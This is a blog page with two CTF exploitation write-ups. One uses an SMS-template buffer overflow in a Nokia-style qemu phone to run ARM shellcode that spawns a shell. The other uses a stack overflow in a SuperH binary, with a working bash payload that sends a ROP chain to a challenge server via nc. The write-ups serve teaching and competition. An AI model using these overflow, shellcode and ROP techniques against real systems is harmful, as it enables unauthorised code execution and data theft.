Tuesday, December 30, 2014

31C3 CTF - Nokia 1337 (Pwn 30)

Here you are, playing a CTF with your mates in Hamburg. You notice there's a new task, “Nokia 1337”.
Enter the trilogy: pwn this phone. Please use only the qemu provided.
Remote instance requires proof of work: nc 188.40.18.78 1024
Connect locally via telnet to localhost:10023 after qemu booted completely.
You download the image, fire it up in Qemu and...

See the phone boot up on http://q3k.org/nokiaboot.webm
...Oh. Oh my.

Club Mate and Rum (it's called a Tschunk!) in hand, you give it a shot...

The challenge

The challenge is the first part of a trilogy of awesomeness prepared by the organizers of the 31C3 CTF. You were given a qemu machine that booted up into a Nokia-like ncurses interface. The machine was an emulated Xilinx Zynq ARM SoC. There was a low-privileged mobile user and a root user. The mobile user had the ncurses UI (a binary with DWARF debug symbols, phew) set as a shell. There was also a baseband communication coprocessor that was essential to solving the second and third parts of the challenge.

Locally, we could log in as root and see that there was a /home/mobile/flag file, containing placeholder text. Remotely, we could only access the ncurses UI via telnet. Obviously, we had to get remote code execution through the UI and read the flag.

The “phone” didn't have that much functionality. You can send and receive SMS messages, save, remove and retrieve contacts, and save, remove and use SMS templates. All storage was handled by an SQLite3 database.

The bug

As previously mentioned, the UI is a DWARF-enabled ARM binary. It's nonrelocatable, and has a writeable and executable data section. This makes our life easier.

After doing some analysis of the binary, I found an interesting function, db_get_template, which is used to retrieve a saved template from the database into a buffer. Why is it interesting? Well, let's take a look at its signature:
Set sail for fail.
The index parameter is given by the caller to identify the ID of the template we want to retrieve. intidptr can be provided by the user to get information on the internal DB ID of the template. textptr is the output buffer address given by the caller. lenptr can be passed to receive the amount of data written to the buffer.

As you might've noticed, there isn't really a way for the caller to get the template length before calling the function - this looks bad. So, where is this function used? Well, when we wish to insert the template into our SMS. Here's the relevant code:
Iceberg, right ahead!
This is the code called when the user selects a template to be inserted into an SMS message. text, at 0x1C600, is a global buffer of the currently edited text message, text_len is a global int of the current text message length. How large is text, you ask?
Your shipment of fail has arrived,
 And since a template can also be 160 characters... Whoops! We have an overflow past the end of this buffer.

The exploit

Let's see what we can do with this. What's past this buffer? There's a 0x30-byte long structure named screen_input_dialog_arguments that contains data on how an input screen module should be called when inputting a number (when sending a message). While there are a few function pointers that we could overwrite there, there are also a whole bunch of pointers into complex structures. While doable, it's not something I'd like to have to fix up with my exploit in order to get one of the pointers called without crashing. Maybe there's a better attack vector?

Eww.

The next structure that we can overflow is screen_sms_write, a structure defining the callbacks that are called by the UI layer when we leave, enter, or input data in the SMS write screen. This looks promising! The first callback normally points to sms_write_enter, and is called when we enter the SMS write screen. So, in theory, we could overflow that pointer, leave the SMS text editor, re-enter it and then the code execution would jump wherever we want. Nice, let's try that.

Groovy, Baby! Yeah!
Let's say we make a 160-byte long template, with the last four bytes containing the address we want to write into the first callback at 0x1C6D4. Since the message buffer starts at 0x1C600, the callback sits 0xD4 (212) bytes into it, so our combined message+template text should be 216 bytes long. Since the template is 160 bytes long, our message should be 56 bytes long. Here's what I did to test whether this attack works:

  • I created a new template, with 156 'B' characters and 4 'Z' characters. I saved it into memory.
  • I created a new message, with 56 'A' characters. I then inserted the previously crafted template at the end.
  • I exited the message editor and re-entered it.
  • I observed that the UI crashed.
So, we get a crash. If we attach GDB to the qemu stub and break around, we do indeed see a failed jump to 0x5A5A5A5A ('ZZZZ' treated as a pointer). So our smashing works!
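The arithmetic behind that test can be double-checked with a short Python sketch. The two addresses and the 160-byte template length come from the analysis above; the variable names are only labels chosen here, and the pointer is decoded as little-endian on the assumption that the target is a little-endian ARM build (for 'ZZZZ' the byte order makes no difference anyway).

```python
import struct

TEXT_BUF = 0x1C600      # start of the global SMS text buffer
CALLBACK = 0x1C6D4      # first callback pointer in screen_sms_write
TEMPLATE_LEN = 160      # length of the crafted template

offset = CALLBACK - TEXT_BUF          # distance from buffer start to the pointer
total = offset + 4                    # the pointer itself is 4 bytes wide
message_len = total - TEMPLATE_LEN    # filler typed before inserting the template

template = b"B" * 156 + b"Z" * 4      # the test template from the list above
message = b"A" * message_len
combined = message + template         # what ends up in memory from TEXT_BUF on

# Decode the four bytes that land on top of the callback pointer.
(pointer,) = struct.unpack_from("<I", combined, offset)
print(offset, total, message_len, hex(pointer))
```

The last four template bytes land exactly on the callback slot, which is why the crash address is made of 'Z' characters.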

Surprisingly, this was the easy part of the exploit. Now onto the hard part, especially if you're new to ARM exploitation....

Weaponization

We need a shellcode. Apparently, all public ARM shellcodes suck, especially if they can't contain 0x00, 0x0A, 0x1A, 0x1B and 0x1C characters. I ended up writing my own, and it's not very pretty:

'shiiii' is the sound I make each time I look at this.
The next step was to automate typing in the shellcode and other long strings into the UI. I wrote a proxy server in Python that would let me connect from a Telnet terminal and also trigger certain automated actions (typing in production token, credentials, template and SMS message). My final exploit looks like this:
  • Create a new template, with 156 'A' characters and 4 bytes of our shellcode address - 0x1C604. Remember, we can't send zeroes, so I had to add 4 to the message buffer address.
  • Create a new message with our shellcode, padded from the left with 4 'Z' characters, and from the right with enough 'Z' characters to make the whole thing be 56 bytes long. Now our shellcode is at 0x1C604 in memory.
  • Insert our template. Now we've overflowed 0x1C604, our shellcode address, into the sms_write_enter callback.
  • Exit the message screen, and re-enter it. Now we're executing our shellcode, which in turn does execve("/bin/sh\0", 0, 0).
  • Get flag.
  • ????
  • PROFIT
The final exploit code can be found at https://github.com/q3k/ctf/tree/master/31c3/nokia.
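As a rough illustration of the constraints above (this is not the code from the repository), here is a Python sketch that checks a payload for the bytes that can't be typed and pads the message to 56 bytes. The helper names are made up for this example, and the 40-byte placeholder only stands in for the real shellcode, which is not reproduced here.

```python
BAD_BYTES = {0x00, 0x0A, 0x1A, 0x1B, 0x1C}   # bytes that can't be typed into the UI
TEXT_BUF = 0x1C600                           # start of the message buffer
MESSAGE_LEN = 56                             # message length worked out earlier


def bad_offsets(data):
    """Return the offsets of all untypeable bytes in data."""
    return [i for i, b in enumerate(data) if b in BAD_BYTES]


def build_message(shellcode):
    """Pad shellcode with 'Z': 4 bytes on the left, the rest on the right."""
    if bad_offsets(shellcode):
        raise ValueError("shellcode contains untypeable bytes")
    body = b"Z" * 4 + shellcode
    if len(body) > MESSAGE_LEN:
        raise ValueError("shellcode does not fit into the message")
    return body.ljust(MESSAGE_LEN, b"Z")


# Hypothetical stand-in for the real shellcode (placeholder bytes only).
placeholder = b"\xAA" * 40
message = build_message(placeholder)
shellcode_addr = TEXT_BUF + 4                # where the shellcode starts in memory

# Compare only the low three bytes of both candidate addresses. The high byte
# is zero either way, and how it is handled is not covered by this sketch.
buf_low = TEXT_BUF.to_bytes(4, "little")[:3]
sc_low = shellcode_addr.to_bytes(4, "little")[:3]
print(hex(shellcode_addr), bad_offsets(buf_low), bad_offsets(sc_low))
```

The buffer address itself has a zero low byte, while the address shifted by 4 does not, which is the reason for the 4 'Z' characters in front of the shellcode.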

And here's a video of the pwn happening:


An excellent challenge and CTF overall. Thanks CCCAC and StatumAuhuur for the challenge, and thanks fail0verflow and pasten for the fierce competition!

But there are two parts left.... stay tuned.

Thursday, December 11, 2014

SecCon 2014 - Japanese super micro-controller (exploitation 500)

As usual, when CTF tasks are marked with the exploitation tag, a binary file is made available and contestants are instructed to connect to a specific port on a specific IP in order to solve the challenge.

Executing the file command on the provided binary gives the following output:

$ file passcheck-sh 
passcheck-sh: ELF 32-bit MSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped

If you are as old as I am :), then maybe you remember a Japanese company named Hitachi, which developed its own CPU core called SuperH (SH). This is it; the company at some point sold the IP rights to Renesas, and we now call this somewhat forgotten CPU architecture Renesas SH. By the way, the predecessor of this CPU, the SH-2, was used as the main CPU in some Sega consoles back in the day.

Well, after a quick session with a search engine I managed to find both big- and little-endian SH emulators for Linux (in the qemu package), but further research revealed that the operating systems (user-lands) come in the little-endian flavor only and we have a big-endian binary. Bummer!

Having a working OS image would be a real help. In that case I would be able to debug the thing and test the various stages of the exploit as I developed it. Unfortunately, creating even a stub of an OS (bash and friends) would take quite a lot of time, so I decided to simply use the little-endian flavor. And it turned out to be quite useful later on.

While booting the emulator, I opened the file in IDA-Pro, and took a look at the resulting disassembly stream. It was rather straightforward. I was able to rather quickly understand the meaning of basic assembler instructions (mov, jsr, rts, sts, lds, trapa, nop) and how the registers are utilized (e.g. r15 as SP). The only peculiar thing was the syscall execution procedure (function names are completely mine).

.text:00004054 syscall_write:
.text:00004054     sts.l   pr, @-r15
.text:00004056     mov     r4, r1
.text:00004058     mov     r5, r2
.text:0000405A     mov     r6, r7
.text:0000405C     mov     #4, r4
.text:0000405E     mov     r1, r5
.text:00004060     mov.l   #maybe_syscall, r0
.text:00004062     jsr     @r0 ; maybe_syscall
.text:00004064     mov     r2, r6
.text:00004066     lds.l   @r15+, pr
.text:00004068     rts
.text:0000406A     nop
...
.text:0000401C maybe_syscall:
.text:0000401C
.text:0000401C     trapa   #h'22
.text:0000401E     rts

As you can see, the syscall value is passed in r4, while by reading the Linux kernel I found out that it should be r3. Also, arguments to syscalls are passed in r5, r6, r7 while in the vanilla Linux kernel it's r3 (syscall number), r4 (1st argument)... and so on.
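To make the mismatch concrete, here is a tiny Python model of the two conventions. It assumes nothing beyond the register assignments described above; the function name, the dictionary layout and the example values are purely illustrative.

```python
def to_linux_convention(regs):
    """Shift the binary's registers (r4..r7) down to vanilla Linux's (r3..r6)."""
    return {
        "r3": regs["r4"],   # syscall number
        "r4": regs["r5"],   # 1st argument
        "r5": regs["r6"],   # 2nd argument
        "r6": regs["r7"],   # 3rd argument
    }


# A write(1, buf, 16) call the way the challenge binary sets it up:
# syscall number in r4, arguments in r5, r6 and r7 (values are examples).
challenge = {"r4": 4, "r5": 1, "r6": 0x00FFB02C, "r7": 16}
linux = to_linux_convention(challenge)
print(linux)
```

Every value moves down by exactly one register, so a four-instruction shim in front of the trap is enough to bridge the two conventions.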

In order to run a working binary (on a little-endian system) I had to modify it (i.e. the IDA-Pro assembler output) a bit before compiling with gcc. After this modification, the maybe_syscall took the following form:

maybe_syscall:
   mov r4, r3
   mov r5, r4
   mov r6, r5
   mov r7, r6

   trapa #0x17
   rts


Let's compile and run it:

$ gcc -Wl,-Tdata=0xffa000 pass.s -o pass -nostdlib
$ ./pass 
Input password: 

Voila!

BTW, the -Wl,-Tdata=0xffa000 flag is necessary, because the original binary used this memory chunk as a stack, by doing:

.text:00004000 _start:
.text:00004000     mov.l   #h'FFB000, r15
.text:00004002     mov.l   #stage1, r1
.text:00004004     jsr     @r1 ; stage1

Also, the addresses in our binary will differ from the original ones due to this modification, so I didn't care about moving the .text section to the address of 0x4000.

Ok, now we have a working binary, but it's incompatible (endianness). Still, it's very useful for testing. Typing a lot of ASCII characters (a typical first test) as a response to Input password: resulted in

$ ./pass 
Input password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

Is it our bug? We could read the output of IDA-Pro, but we can also (in the absence of a working gdb, which was simply crashing with any binary) use...

$ strace -e trace=none ./pass 
Input password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
+++ killed by SIGSEGV +++
Segmentation fault


Well, ok, the SEGV_MAPERR value can stand for at least a few things: unmapped address, bad permission bits, address execution fault, address fetch fault etc. So, reading the output of the disassembler to confirm our assumptions is always a good idea. I did it (spent some time annotating functions and trying to understand the execution flow), and yeah, that's our bug (a buffer overflow on the stack and no ASLR/PIE/SSP).

Update: Later that day I realized that I could have used 'strace -i -e trace=none ./<binary>' to confirm that IP is set to 0x41414141.

Should be easy, right? Well... not really, the stack is non-executable. Or rather, it is executable, but only under the qemu emulator and not on the CTF infrastructure. (I tested this by creating a simple exploit and compiling it under my SH emulator, which can, BTW, compile for both little- and big-endian CPUs.)

So, were they using a real SuperH machine (Linux on Sega:)? Interesting. At this point the only thing I could think of was, wait for it, ROP! :)

By using the user-mode version of the qemu-sh emulator (qemu-sh4) and testing it with AAAAAAAAAAAAAA..... input, I realized that the ip, r4, r5, r6 and r7 registers held my 0x41414141 values as well. That seemed awesome, because the authors of the challenge had basically given us a ROP gadget which prepares the registers for syscalls. One of those gadgets is located here:

.text:0000424C     mov.l   @r15+, r7
.text:0000424E     mov.l   @r15+, r6
.text:00004250     mov.l   @r15+, r5
.text:00004252     mov.l   @r15+, r4
.text:00004254     lds.l   @r15+, pr
.text:00004256     rts
.text:00004254     lds.l   @r15+, r8   (due to delayed branching it will be executed as well!!!)

That's a real gem! We can basically populate the stack with data, and the code will simply load the registers and call whatever function we like, e.g. maybe_syscall (i.e. it will call any address, but we can redirect it to the maybe_syscall function by setting PR to a correct value).

There's only one thing that needs to be changed here, though. If we did what I just described, the maybe_syscall function would loop forever, because under SuperH the last return address is stored in the PR register and not on the execution stack. Therefore I had to jump through a jsr/rts stub, which can be found here:

.text:00004028     mov.l   #maybe_syscall, r0
.text:0000402A     jsr     @r0 ; maybe_syscall
.text:0000402C     nop
.text:0000402E     lds.l   @r15+, pr
.text:00004030     rts

To sum up our ROP: 0x0000424C (load registers), 0x00004028 (change the PR register to a controlled value by doing jsr maybe_syscall, and return back to our gadget), 0x0000401C (our syscall invocation). The sequence of syscalls that I wanted to execute was:

open:
  • syscall_nr: 5
  • arg_1 = ptr to "flag.txt" (provided by me on the stack)
  • arg_2 = 0 (O_RDONLY)
  • arg_3 = irrelevant (not used with O_RDONLY)

read:
  • syscall_nr: 3
  • arg_1 = resulting file-descriptor (unknown to us at this point)
  • arg_2 = ptr to a free stack buffer (we can simply overwrite the "flag.txt" string here) - 0x00FFB02C
  • arg_3 = some numeric value, like 20 or 30 or so (number of bytes to read, roughly equal or greater than the expected flag size)

write:
  • syscall_nr: 4
  • arg_1 = 1 (stdout)
  • arg_2 = ptr to our buffer - in our case: 0x00FFB02C
  • arg_3 = some low-number value (number of bytes to write)
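The three calls above can be laid out as big-endian 32-bit words in Python. This is a hedged sketch rather than the exploit I actually ran: the gadget and stub addresses and the buffer address are the ones quoted in this write-up, while the helper names, the 4-byte filler between frames and the concrete byte counts (0x40 for read, 0x300 for write) are choices made for this illustration. The descriptor passed to read is left as a parameter.

```python
import struct

LOAD_REGS = 0x0000424C   # gadget: pops r7, r6, r5, r4 and then PR
CALL_STUB = 0x00004028   # stub: jsr maybe_syscall, then pops a new PR
BUF = 0x00FFB02C         # stack address that first holds "flag.txt"
FILLER = b"1111"         # 4 filler bytes between frames (assumed to be ignored)


def frame(nr, arg_1, arg_2, arg_3):
    """One register frame in pop order (r7, r6, r5, r4), then PR -> stub."""
    return struct.pack(">5I", arg_3, arg_2, arg_1, nr, CALL_STUB)


def build_payload(fd):
    """Chain open, read and write; fd is the guessed descriptor for read."""
    link = FILLER + struct.pack(">I", LOAD_REGS)   # go back to the gadget
    payload = frame(5, BUF, 0, 0) + link           # open("flag.txt", O_RDONLY)
    payload += frame(3, fd, BUF, 0x40) + link      # read(fd, BUF, 0x40)
    payload += frame(4, 1, BUF, 0x300)             # write(1, BUF, 0x300)
    payload += b"flag.txt\x00"                     # the string that BUF points at
    return payload


payload = build_payload(3)
print(len(payload), payload[:20].hex())
```

Only one byte of the payload depends on the guessed descriptor, so trying several guesses just means rebuilding the payload with a different fd.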


At this point I didn't know what file-descriptor number the open syscall would return. I assumed it's 3, but one never knows, so I chose to brute-force it :). The resulting shell-code is attached below (admit it, bash haxxxoring is the best haxxxoring, python s..cks :). An alternative would be to invoke close(3) before calling open.

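#!/bin/bash
# Brute-force the file descriptor returned by open(): try 2..20 as the fd passed to read().
# Every word is big-endian. Each 16-byte block is r7, r6, r5, r4 for the next syscall.

while true; do
  for x in $(seq 2 20); do
    A=$(printf "%02x" "$x")

    echo "== $A ===" >>/tmp/haslo
    {
      # open: arg_3 = 0, arg_2 = 0 (O_RDONLY), arg_1 = 0x00FFB02C ("flag.txt"), syscall_nr = 5
      echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xB0\x2C\x00\x00\x00\x05"
      echo -ne "\x00\x00\x40\x28"   # jsr/rts stub around maybe_syscall

      echo -ne "1111"               # filler word
      echo -ne "\x00\x00\x42\x4C"   # register-loading gadget
      # read: arg_3 = 0x40 bytes, arg_2 = 0x00FFB02C, arg_1 = guessed fd, syscall_nr = 3
      echo -ne "\x00\x00\x00\x40\x00\xFF\xB0\x2C\x00\x00\x00\x$A\x00\x00\x00\x03"
      echo -ne "\x00\x00\x40\x28"

      echo -ne "1111"
      echo -ne "\x00\x00\x42\x4C"
      # write: arg_3 = 0x300 bytes, arg_2 = 0x00FFB02C, arg_1 = 1 (stdout), syscall_nr = 4
      echo -ne "\x00\x00\x03\x00\x00\xFF\xB0\x2C\x00\x00\x00\x01\x00\x00\x00\x04"
      echo -ne "\x00\x00\x40\x28"

      echo -ne "flag.txt\x00"       # lands at 0x00FFB02C
      echo
    } | nc -v micro.pwn.seccon.jp 10000 >>/tmp/haslo
  done
done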

After a couple of iterations (because the file descriptor returned by the open syscall can be anything, and we need to match it in the read syscall that follows), the password will appear in /tmp/haslo :).

== 02 ===
Input password: flag.txt
== 03 ===
Input password: flag.txt
== 04 ===
Input password: flag.txt
== 05 ===
Input password: flag.txt
== 06 ===
Input password: SECCON{CakeOfBeanCurd}

== 07 ===
Input password: flag.txt
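Spotting the one interesting line in a long log can also be automated. Below is a small Python sketch that walks a log in the format shown above and reports which guessed descriptor produced the flag. It assumes the flag always looks like SECCON{...}, which is inferred from the single flag seen here; the function name is made up for this example.

```python
import re


def find_flag(log_text):
    """Return (fd, flag) for the first flag found in the log, or None."""
    fd = None
    for line in log_text.splitlines():
        header = re.fullmatch(r"== ([0-9a-f]{2}) ===", line.strip())
        if header:
            fd = int(header.group(1), 16)   # descriptor guessed in this attempt
            continue
        flag = re.search(r"SECCON\{[^}]*\}", line)
        if flag:
            return fd, flag.group(0)
    return None


sample = """== 05 ===
Input password: flag.txt
== 06 ===
Input password: SECCON{CakeOfBeanCurd}

== 07 ===
Input password: flag.txt
"""
print(find_flag(sample))
```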